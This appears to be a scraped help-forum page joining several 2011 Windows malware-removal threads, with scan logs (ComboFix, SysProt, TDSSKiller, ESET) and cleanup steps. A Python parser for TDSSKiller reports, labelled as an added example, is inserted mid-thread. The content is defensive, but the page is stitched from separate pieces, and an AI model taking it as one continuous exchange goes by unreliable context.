2011-05-23 12:38 . 2011-05-23 12:38  --------  d-----w-  C:\Softpaq
2011-05-23 07:07 . 2011-05-23 07:07  664  ----a-w-  c:\documents and settings\NetworkService\Local Settings\Application Data\d3d9caps.tmp
2011-05-22 22:56 . 2011-05-22 22:56  --------  d-----w-  c:\documents and settings\All Users\Application Data\nView_Profiles
2011-05-22 16:25 . 2011-05-22 16:26  --------  d-----w-  c:\program files\Microsoft Security Client
2011-05-21 13:19 . 2011-05-21 13:23  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\FixCleaner
2011-05-21 13:17 . 2011-05-21 13:28  --------  d-----w-  c:\program files\FixCleaner
2011-05-21 11:08 . 2011-05-21 11:08  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\DriverCure
2011-05-21 11:08 . 2011-05-21 11:08  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\ParetoLogic
2011-05-21 11:08 . 2011-05-22 16:18  --------  d-----w-  c:\documents and settings\All Users\Application Data\ParetoLogic
2011-05-20 23:38 . 2011-05-20 23:38  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\MSNInstaller
2011-05-08 13:29 . 2011-05-19 23:47  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\Nitro PDF
2011-05-08 13:28 . 2011-04-06 01:55  17712  ----a-w-  c:\windows\system32\nitrolocalui.dll
2011-05-08 13:28 . 2011-04-06 01:55  26416  ----a-w-  c:\windows\system32\nitrolocalmon.dll
2011-05-08 13:28 . 2011-05-08 13:28  --------  d-----w-  c:\documents and settings\All Users\Application Data\Nitro PDF
2011-05-08 13:27 . 2011-05-08 13:27  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\Downloaded Installations
2011-05-08 13:15 . 2011-02-28 22:37  180624  ----a-w-  c:\windows\system32\Primomonnt.dll
2011-05-08 13:15 . 2011-05-20 23:34  --------  d-----w-  c:\program files\Nitro PDF
2011-05-07 17:32 . 2011-05-07 17:32  --------  d-----w-  c:\documents and settings\HP_Administrator\Local Settings\Application Data\Kobo
2011-05-07 17:31 . 2011-05-07 17:32  --------  d-----w-  c:\program files\Kobo
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-05-21 11:20 . 2004-08-10 04:00  14336  ----a-w-  c:\windows\system32\svchost.exe
2011-04-14 09:07 . 2010-12-20 00:29  472808  ----a-w-  c:\windows\system32\deployJava1.dll
2011-04-14 06:40 . 2008-07-08 22:01  73728  ----a-w-  c:\windows\system32\javacpl.cpl
2011-03-29 19:09 . 2011-03-29 19:09  21504  ----a-w-  c:\windows\system32\drivers\libusb0.sys
2011-03-29 19:09 . 2011-03-29 19:09  37376  ----a-w-  c:\windows\system32\libusb0.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray"="c:\windows\ehome\ehtray.exe" [2005-08-06 64512]
"RTHDCPL"="RTHDCPL.EXE" [2006-03-08 16010240]
"AlwaysReady Power Message APP"="ARPWRMSG.EXE" [2005-08-03 77312]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2006-01-25 7311360]
"nwiz"="nwiz.exe" [2006-01-25 1519616]
"HPHUPD08"="c:\program files\HP\Digital Imaging\{33D6CC28-9F75-4d1b-A11D-98895B3A3729}\hphupd08.exe" [2005-06-02 49152]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 10.0\Reader\Reader_sl.exe" [2011-01-30 35736]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-11-10 932288]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2010-11-30 997408]
"@OnlineArmor GUI"="c:\program files\Online Armor\OAui.exe" [2011-04-06 2477032]
.
c:\documents and settings\HP_Administrator\Start Menu\Programs\Startup\
wkcalrem.LNK - c:\program files\Common Files\Microsoft Shared\Works Shared\WkCalRem.exe [2004-6-23 15360]
.
c:\documents and settings\All Users\Start Menu\Programs\Startup\
HP Digital Imaging Monitor.lnk - c:\program files\HP\Digital Imaging\bin\hpqtra08.exe [2005-12-15 282624]
Updates From HP.lnk - c:\program files\Updates from HP\9972322\Program\Updates from HP.exe [2006-6-5 36903]
.
c:\documents and settings\Default User\Start Menu\Programs\Startup\
Pin.lnk - c:\hp\bin\CLOAKER.EXE [2006-6-5 27136]
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{4F07DA45-8170-4859-9B5F-037EF2970034}"= "c:\progra~1\ONLINE~2\oaevent.dll" [2011-04-06 354720]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21  548352  ----a-w-  c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AppleSyncNotifier]
2009-08-13 19:51  177440  ----a-w-  c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\D-Link RangeBooster G WUA-2340]
2006-09-01 16:09  1880064  ----a-w-  c:\program files\D-Link\RangeBooster G WUA-2340\AirPlusCFG.exe
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqnrs08.exe"=
"c:\\Program Files\\Updates from HP\\9972322\\Program\\Updates from HP.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\Program Files\\Adobe\\Photoshop 5.0 LE\\photosle.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"57772:TCP"= 57772:TCP:Pando Media Booster
"57772:UDP"= 57772:UDP:Pando Media Booster
.
R0 sonypvl2;sonypvl2;c:\windows\system32\drivers\sonypvl2.sys [06/08/2006 1:38 PM 19478]
R1 MpKsl83bc2927;MpKsl83bc2927;c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{9FB231EF-0036-4D0F-85EA-3DF4A8ED3BAC}\MpKsl83bc2927.sys [26/05/2011 8:01 PM 28752]
R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [23/05/2011 12:43 PM 205864]
R1 oahlpXX;Online Armor helper driver;c:\windows\system32\drivers\oahlp32.sys [23/05/2011 12:43 PM 39048]
R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [23/05/2011 12:43 PM 25192]
R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [23/05/2011 12:43 PM 29464]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 2:41 PM 67656]
R1 sonypvf2;sonypvf2;c:\windows\system32\drivers\sonypvf2.sys [06/08/2006 1:38 PM 635012]
R1 sonypvt2;sonypvt2;c:\windows\system32\drivers\sonypvt2.sys [06/08/2006 1:38 PM 431236]
R2 OAcat;Online Armor Helper Service;c:\program files\Online Armor\oacat.exe [23/05/2011 12:42 PM 381512]
R2 PCToolsSSDMonitorSvc;PC Tools Startup and Shutdown Monitor service;c:\program files\Common Files\PC Tools\sMonitor\StartManSvc.exe [08/08/2010 7:56 AM 583640]
R2 SvcOnlineArmor;Online Armor;c:\program files\Online Armor\oasrv.exe [23/05/2011 12:42 PM 4326472]
S1 MpKsl260ec945;MpKsl260ec945;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{6DE8016F-E060-4066-9D1D-0C92C0E051F9}\MpKsl260ec945.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{6DE8016F-E060-4066-9D1D-0C92C0E051F9}\MpKsl260ec945.sys [?]
S3 A5AGU;D-Link USB Wireless Network Adapter Service;c:\windows\system32\drivers\A5AGU.sys [08/05/2006 7:10 PM 347648]
.
Contents of the 'Scheduled Tasks' folder
.
2011-05-21 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2007-08-29 16:34]
.
2011-05-27 c:\windows\Tasks\MP Scheduled Scan.job
- c:\program files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2010-11-11 16:26]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://sympatico.msn.ca/
uDefault_Search_URL = hxxp://www.google.com/ie
mSearch Bar = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_CA&c=63&bd=PAVILION&pf=desktop
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~4\OFFICE11\EXCEL.EXE/3000
IE: eBay Search - c:\program files\eBay\eBay Toolbar2\eBayTb.dll/RCSearch.html
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_6CE5017F567343CA.dll/cmsidewiki.html
TCP: DhcpNameServer = 192.168.2.1
DPF: {861DB4B6-3838-11D2-8E50-002018200E57} - hxxp://data6.archives.ca/mrsidi_cab/MrSIDI.cab
.
- - - - ORPHANS REMOVED - - - -
.
HKLM-Run-PCDrProfiler - (no file)
HKLM-Run-SunJavaUpdateSched - c:\program files\Java\jre6\bin\jusched.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-05-26 20:24
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files:
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@DENIED: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10p_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10p_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(668)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
- - - - - - - > 'explorer.exe'(636)
c:\windows\system32\WININET.dll
c:\docume~1\HP_ADM~1\LOCALS~1\Temp\IadHide5.dll
c:\windows\system32\nview.dll
c:\windows\system32\nvwddi.dll
c:\windows\system32\ieframe.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\Antimalware\MsMpEng.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\windows\arservice.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\eHome\ehRecvr.exe
c:\windows\eHome\ehSched.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Common Files\LightScribe\LSSrvc.exe
c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
c:\windows\system32\nvsvc32.exe
c:\windows\ehome\mcrdsvc.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\wscntfy.exe
c:\windows\RTHDCPL.EXE
c:\windows\ARPWRMSG.EXE
c:\windows\system32\rundll32.exe
c:\windows\eHome\ehmsas.exe
c:\program files\Online Armor\OAhlp.exe
.
**************************************************************************
.
Completion time: 2011-05-26 20:30:29 - machine was rebooted
ComboFix-quarantined-files.txt 2011-05-27 00:30
ComboFix2.txt 2011-05-26 22:10
.
Pre-Run: 90,545,614,848 bytes free
Post-Run: 90,534,047,744 bytes free
.
- - End Of File - - 798D704585D07673445577B99431B60A

Quote
Is there a way to stop the firewalls from starting. When Online Armor is disabled, Windows Firewall starts up and I have to jump to the Control panel to stop that.
Here's what I do with my firewall. If I'm installing a new program I disable my third-party firewall and enable my Windows firewall otherwise a 10 job will turn into a 30 min. chore. In fact, that's what I had to do when I tried to run ComboFix yesterday on my computer.

SysProt Antirootkit

Download SysProt Antirootkit from the link below (you will find it at the bottom of the page under attachments, or you can get it from one of the mirrors).

http://sites.google.com/site/sysprotantirootkit/

Unzip it into a folder on your desktop.
  • Double click Sysprot.exe to start the program.
  • Click on the Log tab.
  • In the Write to log box select the following items.
    • Process << Selected
    • Kernel Modules << Selected
    • SSDT << Selected
    • Kernel Hooks << Selected
    • IRP Hooks << NOT Selected
    • Ports << NOT Selected
    • Hidden Files << Selected
  • At the bottom of the page
    • Hidden Objects Only << Selected
  • Click on the Create Log button on the bottom right.
  • After a few seconds a new window should appear.
  • Select Scan Root Drive. Click on the Start button.
  • When it is complete a new window will appear to indicate that the scan is finished.
  • The log will be saved automatically in the same folder Sysprot.exe was extracted to. Open the text file and copy/paste the log here.
Hi SuperDave,

I hope this is the complete scan as I had to do a search for it on my computer:

SysProt AntiRootkit v1.0.1.0
by swatkat

******************************************************************************************
******************************************************************************************

No Hidden Processes found

******************************************************************************************
******************************************************************************************
No Hidden Kernel Modules found

******************************************************************************************
******************************************************************************************
No SSDT Hooks found

******************************************************************************************
******************************************************************************************
No Kernel Hooks found

******************************************************************************************
******************************************************************************************
No hidden files/folders found

Just a note, Online Armor is back on my taskbar. When I shut down last night, Windows asked if I wanted to load the changes (probably from ComboFix).

I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
Hi SuperDave,

Here is what was on the log:

C:\System Volume Information\_restore{106CF321-99A3-4E3A-9103-1BD027606A99}\RP2\A0000064.ini  Win32/Adware.AntimalwareDoctor.AE.Gen application

Please run ESET again and this time, clean the infection.

Hi SuperDave,

Here is the file log:

C:\System Volume Information\_restore{106CF321-99A3-4E3A-9103-1BD027606A99}\RP2\A0000064.ini  Win32/Adware.AntimalwareDoctor.AE.Gen application  cleaned by deleting - quarantined

I checked delete upon exit before closing the program.

That looks good. If there are no other issues, let's do some cleanup.

Download OTL to your desktop.

To remove all of the tools we used and the files and folders they created do the following:
Double click OTL.exe.
  • Click the CleanUp button.
  • Select Yes when the "Begin cleanup Process?" prompt appears.
  • If you are prompted to Reboot during the cleanup, select Yes.
  • The tool will delete itself once it finishes.
Note: If any tool, file or folder (belonging to the program we have used) hasn't been deleted, please delete it manually.
*********************************************************
To turn off Windows XP System Restore:

NOTE: These instructions assume that you are using the default Windows XP Start Menu and have not changed to the Classic Start menu. To re-enable the default menu, right-click Start, click Properties, click Start menu (not Classic) and then click OK.

1. Click Start.
2. Right-click the My Computer icon, and then click Properties.
3. Click the System Restore tab.
4. Check "Turn off System Restore" or "Turn off System Restore on all drives"
5. Click Apply.
6. When turning off System Restore, the existing restore points will be deleted. Click Yes to do this.
7. Click OK.
8. Restart the computer and follow the instructions in the next section to turn on System Restore.

To turn on Windows XP System Restore:

1. Click Start.
2. Right-click My Computer, and then click Properties.
3. Click the System Restore tab.
4. Uncheck "Turn off System Restore" or "Turn off System Restore on all drives."
5. Click Apply, and then click OK.
*******************************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
*****************************************************
Use the Secunia Software Inspector to check for out of date software.

• Click Start Now
• Check the box next to Enable thorough system inspection.
• Click Start
• Allow the scan to finish and scroll down to see if any updates are needed.
• Update anything listed.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster - Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
3268.

Solve : "Open With" window/can't run the programs.?

Answer»

I removed a virus from my PC, but now I get that "Open With" window and can't run programs like Firefox etc. At least not without selecting the program I want to open it with each time.
I'm running Windows XP Home Edition.

I have tried going to http://www.dougknox.com/xp/file_assoc.htm already and I did the steps below, but no luck.

[Look to the "EXE File Association Fix", and download the .ZIP file to your computer desktop. Once there, unzip the file, then double click on the "xp_exe_fix.reg" file that is inside, choose "OK/Yes" when it asks "Are you sure?". Restart the computer. It should now run those problem programs and Control Panel icons.]


HELP?

3269.

Solve : Programs closing down randomly (Vista)?

Answer»

"Malware Finder has stopped working"

Stops working as soon as I press scan. Just my luck.

Please re-boot in Safe Mode and try to run these two scans.

Doesn't work in safe mode either.

Ok. Let's try this:

  • Download TDSSKiller and save it to your Desktop.
  • Extract its contents to your desktop.
  • Once extracted, open the TDSSKiller folder and double-click on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • Click the Report button and copy/paste the contents of it into your next reply.
Note: It will also create a log in the C:\ directory.

It did detect some rootkit problem I've encountered before and was having a hard time removing.


2011/05/26 22:33:36.0475 4888 TDSS rootkit removing tool 2.5.3.0 May 25 2011 07:09:24
2011/05/26 22:33:36.0598 4888 ================================================================================
2011/05/26 22:33:36.0598 4888 SystemInfo:
2011/05/26 22:33:36.0598 4888
2011/05/26 22:33:36.0598 4888 OS Version: 6.0.6002 ServicePack: 2.0
2011/05/26 22:33:36.0598 4888 Product type: Workstation
2011/05/26 22:33:36.0598 4888 ComputerName: TRINCA-NA-PÊRA
2011/05/26 22:33:36.0598 4888 UserName: Ramiro
2011/05/26 22:33:36.0598 4888 Windows directory: C:\Windows
2011/05/26 22:33:36.0598 4888 System windows directory: C:\Windows
2011/05/26 22:33:36.0598 4888 Running under WOW64
2011/05/26 22:33:36.0598 4888 Processor architecture: Intel x64
2011/05/26 22:33:36.0598 4888 Number of processors: 4
2011/05/26 22:33:36.0598 4888 Page size: 0x1000
2011/05/26 22:33:36.0599 4888 Boot type: Normal boot
2011/05/26 22:33:36.0599 4888 ================================================================================
2011/05/26 22:33:37.0001 4888 Initialize success
2011/05/26 22:33:46.0110 4576 ================================================================================
2011/05/26 22:33:46.0110 4576 Scan started
2011/05/26 22:33:46.0110 4576 Mode: Manual;
2011/05/26 22:33:46.0110 4576 ================================================================================
2011/05/26 22:33:56.0726 4576 MBR (0x1B8) (13af81ffe36981a6a5910f5f7a43b4f8) \Device\Harddisk0\DR0
2011/05/26 22:33:56.0734 4576 \Device\Harddisk0\DR0 - detected Rootkit.Win32.TDSS.tdl4 (0)
2011/05/26 22:33:56.0739 4576 ================================================================================
2011/05/26 22:33:56.0739 4576 Scan finished
2011/05/26 22:33:56.0739 4576 ================================================================================
2011/05/26 22:33:56.0755 4372 Detected object count: 1
2011/05/26 22:33:56.0755 4372 Actual detected object count: 1
2011/05/26 22:34:09.0589 4372 \Device\Harddisk0\DR0 (Rootkit.Win32.TDSS.tdl4) - will be cured after reboot
2011/05/26 22:34:09.0589 4372 \Device\Harddisk0\DR0 - ok
2011/05/26 22:34:09.0589 4372 Rootkit.Win32.TDSS.tdl4(\Device\Harddisk0\DR0) - User select action: Cure
2011/05/26 22:34:12.0188 3188 Deinitialize success
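
The TDSSKiller report posted above, read programmatically, as an added example that is not part of the original thread and not code from the tool's vendor: a Python parser that pulls each detection, the chosen action and the outcome out of such a report and flags objects whose cure is deferred to the next reboot. The sample lines are constructed in the layout of the posted log, and the class and function names are hypothetical.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout of the report above. The thread id after the
# timestamp may or may not be separated from the message by whitespace, so both
# forms are included. The driver line and its all-zero hash are placeholders.
SAMPLE_REPORT = r"""
2011/05/26 22:33:46.0110 4576 Scan started
2011/05/26 22:33:46.0660 4576ExampleDrv (00000000000000000000000000000000) C:\Windows\system32\drivers\example.sys
2011/05/26 22:33:56.0734 4576\Device\Harddisk0\DR0 - detected Rootkit.Win32.TDSS.tdl4 (0)
2011/05/26 22:33:56.0739 4576 Scan finished
2011/05/26 22:33:56.0755 4372Detected object count: 1
2011/05/26 22:34:09.0589 4372\Device\Harddisk0\DR0 (Rootkit.Win32.TDSS.tdl4) - will be cured after reboot
2011/05/26 22:34:09.0589 4372 Rootkit.Win32.TDSS.tdl4(\Device\Harddisk0\DR0) - User select action: Cure
"""

# Timestamp, thread id, then the message (assumes a message never starts with a digit).
LINE = re.compile(r"^\d{4}/\d\d/\d\d \d\d:\d\d:\d\d\.\d{4} \d+\s*(.*)$")
DETECTED = re.compile(r"^(?P<obj>.+?) - detected (?P<verdict>\S+) \(\d+\)$")
ACTION = re.compile(
    r"^(?P<verdict>[^()\s]+)\((?P<obj>.+)\) - User select action: (?P<action>\w+)$")
OUTCOME = re.compile(r"^(?P<obj>.+?) \((?P<verdict>[^)]+)\) - (?P<outcome>.+)$")
COUNT = re.compile(r"^Detected object count: (\d+)$")


@dataclass
class Finding:
    obj: str            # scanned object, e.g. a driver path or a disk device
    verdict: str        # detection name reported by the scanner
    action: str = ""    # what the user chose (Cure, Skip, ...)
    outcome: str = ""   # what the tool says happened or will happen

    @property
    def reboot_pending(self):
        return "after reboot" in self.outcome.lower()


def parse_report(text):
    """Return (findings, declared_count) for one report."""
    findings = {}
    declared = None
    for raw in text.splitlines():
        line = LINE.match(raw.strip())
        if not line:
            continue
        msg = line.group(1).strip()
        count = COUNT.match(msg)
        if count:
            declared = int(count.group(1))
            continue
        for pattern in (DETECTED, ACTION, OUTCOME):
            hit = pattern.match(msg)
            if hit:
                f = findings.setdefault(
                    hit["obj"], Finding(hit["obj"], hit["verdict"]))
                fields = hit.groupdict()
                f.action = fields.get("action", f.action)
                f.outcome = fields.get("outcome", f.outcome)
                break
    return list(findings.values()), declared


def triage(findings, declared):
    """List the follow-ups a responder still owes for this host."""
    notes = []
    if declared is not None and declared != len(findings):
        notes.append(
            f"report declares {declared} detections, parsed {len(findings)}")
    for f in findings:
        if f.reboot_pending:
            notes.append(
                f"{f.obj}: {f.verdict} cure deferred until reboot; rescan afterwards")
        elif f.action.lower() in ("", "skip"):
            notes.append(
                f"{f.obj}: {f.verdict} left in place "
                f"(action: {f.action or 'none recorded'})")
    return notes


if __name__ == "__main__":
    found, declared_count = parse_report(SAMPLE_REPORT)
    for note in triage(found, declared_count):
        print(note)
```

A detection that is only "cured after reboot" means the host should be treated as still infected until it has restarted and a second scan comes back clean.
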

Please try running Rooter.exe again.

Still not working.

Ok. Let's try this:

AVENGER

  • Download The Avenger by Swandog46 from here.
  • Unzip/extract it to a folder on your desktop.
  • Double click on avenger.exe to run The Avenger.
  • Click OK.
  • Make sure that the box next to Scan for rootkits has a tick in it and that the box next to Automatically disable any rootkits found does not have a tick in it.
  • Click the Execute button.
  • You will be asked "No script has been entered. Do you want to execute a rootkit scan only?".
  • Click Yes.
  • You will now be asked "First step completed --- The Avenger has been successfully set up to run on next boot. Reboot now?".
  • Click Yes.
  • Your PC will now be rebooted.
  • After your PC has completed the necessary reboots, a log should automatically open. If it does not automatically open, then the log can be found at %systemdrive%\avenger.txt (typically C:\avenger.txt).
  • Please post this log in your next reply.

I ran the avenger and then rebooted the PC as asked, but there weren't any logs saved.

I'd like to scan your machine with ESET OnlineScan.

• Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
• Click the button.
• For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
• Check
• Click the button.
• Accept any security warnings from your browser.
• Check
• Push the Start button.
• ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
• When the scan completes, push
• Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
• Push the button.
• Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
[emailprotected] as downloader log:
all ok
# version=7
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6427
# api_version=3.0.2
# EOSSerial=4cd547e8b930814f8818bec7ba500350
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2011-05-27 10:43:45
# local_time=2011-05-27 11:43:45 (+0000, Hora de Verão de GMT)
# country="Portugal"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode=512 16777215 100 0 502107 502107 0 0
# compatibility_mode=1024 16777215 100 0 0 0 0 0
# compatibility_mode=5892 16776574 100 56 391430 144052601 0 0
# compatibility_mode=8192 67108863 100 0 348 348 0 0
# scanned=209108
# found=1
# cleaned=1
# scan_time=7529
C:\Users\Ramiro\Desktop\Stuff\FCT\Wolfram Mathematica\M7Win.part1.rar    probably a variant of Win32/Agent.HCHLLEJ trojan (deleted - quarantined)    00000000000000000000000000000000    C
I really don't mind continuing these procedures (as there's always malware that we're not aware of), but it seems like the problem that first made me come here has been fixed. Adding to that, my internet connection seems to be working a lot better (even though the signal has been oscillating a lot according to my Internet Provider), the PC boot time and the general flow of the computer has been great since you've started to help me.

I also took the liberty to follow other tutorials, such as cleaning the hardware, used different defragment software, freed disk space, etc.


I appreciate all the help and the patience Dave.

That's ok. We're finished. Let's do some clean up

To remove all of the tools we used and the files and folders they created do the following:
Double click OTL.exe.
  • Click the CleanUp button.
  • Select Yes when the "Begin cleanup Process?" prompt appears.
